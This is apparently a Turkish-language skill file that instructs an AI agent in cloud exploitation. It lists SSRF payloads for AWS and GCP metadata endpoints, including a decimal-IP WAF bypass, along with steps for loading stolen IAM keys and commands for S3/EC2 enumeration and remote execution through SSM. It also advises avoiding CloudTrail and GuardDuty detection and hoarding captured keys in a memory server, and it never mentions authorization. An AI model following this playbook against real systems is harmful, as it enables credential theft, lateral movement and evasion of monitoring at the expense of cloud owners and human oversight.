---
name: cloud-exploitation
description: "Cloud (Bulut) Pentest Metodolojisi. AWS, GCP ve Azure ortamlarında SSRF üzerinden Metadata Servisi (IMDS) sömürüsü ve ele geçirilen IAM key'leri ile bulut kaynaklarının keşfi."
---

# Bulut (Cloud) Güvenliği Metodolojisi

Hedef uygulamanın AWS, GCP veya Azure üzerinde barındırıldığını tespit ettiğinde (veya bir SSRF zafiyeti bulduğunda) klasik ağ taramalarını bırakıp doğrudan Bulut Metadata servislerine odaklanmalısın.

## 1. SSRF Üzerinden IMDS (Instance Metadata Service) Sömürüsü
Bir SSRF (Sunucu Taraflı İstek Sahteciliği) zafiyeti bulduğunda, önceliğin her zaman Bulut Metadata sunucusu (`169.254.169.254`) olmalıdır.

- **Eylem:** `mcp-web-advanced` içindeki `generate_cloud_ssrf_payloads` aracını kullan.
- **Neden:** Bulut sağlayıcıları IMDSv2 gibi korumalarla metadata erişimini zorlaştırır. Bu araç, gerekli HTTP başlıklarını (örn: `X-aws-ec2-metadata-token`) ve WAF atlatma varyantlarını (örn: `http://169.254.169.254` yerine `http://2852039166`) içeren payload'lar üretir.

### AWS (IMDSv1 / IMDSv2) Endpoint'leri:
- `http://169.254.169.254/latest/meta-data/`
- `http://169.254.169.254/latest/meta-data/iam/security-credentials/` -> Mevcut IAM rollerinin isimlerini verir.
- `http://169.254.169.254/latest/meta-data/iam/security-credentials/{ROL_ADI}` -> Geçici kimlik bilgilerini (AccessKeyId, SecretAccessKey, Token) JSON olarak döndürür.

### GCP (Google Cloud) Endpoint'leri:
GCP'de her zaman `Metadata-Flavor: Google` başlığı (header) gönderilmelidir.
- `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`

## 2. Çalınan IAM Key'lerin Doğrulanması ve Kullanımı
Bir IAM key ele geçirdiğinde, bu anahtarı asla kişisel makinenin global ayarlarına yazma (`~/.aws/credentials` üzerine doğrudan yazma). Geçici (environment variable) olarak kullan.

- **Kurulum:**
  ```bash
  export AWS_ACCESS_KEY_ID="ASI..."
  export AWS_SECRET_ACCESS_KEY="..."
  export AWS_SESSION_TOKEN="..."
  ```

- **Kimlik Doğrulama:** Kim olduğunu ve hangi haklara sahip olduğunu öğren.
  ```bash
  aws sts get-caller-identity
  ```

## 3. Enumeration (Bilgi Toplama) ve S3 Keşfi
Hangi kaynaklara erişebildiğini bul.
- **S3 Bucket'ları Listeleme:**
  ```bash
  aws s3 ls
  aws s3 ls s3://bucket-adi --recursive
  ```
- **EC2 Instance'ları:**
  ```bash
  aws ec2 describe-instances --region us-east-1
  ```
- **SSM (Systems Manager):** Eğer yetkin varsa diğer makinelerde komut çalıştır.
  ```bash
  aws ssm send-command --instance-ids "i-12345" --document-name "AWS-RunShellScript" --parameters commands="id"
  ```

## 4. Emniyet ve İletişim
Bulut ortamlarındaki IAM key'leri genellikle `CloudTrail` ve `GuardDuty` gibi izleme sistemlerine bağlıdır. Çok fazla "AccessDenied" hatası üretirsen anında tespit edilirsin. Emin olmadığın komutları çalıştırma ve ele geçirdiğin key'leri derhal `mcp-memory-server`'a kaydet.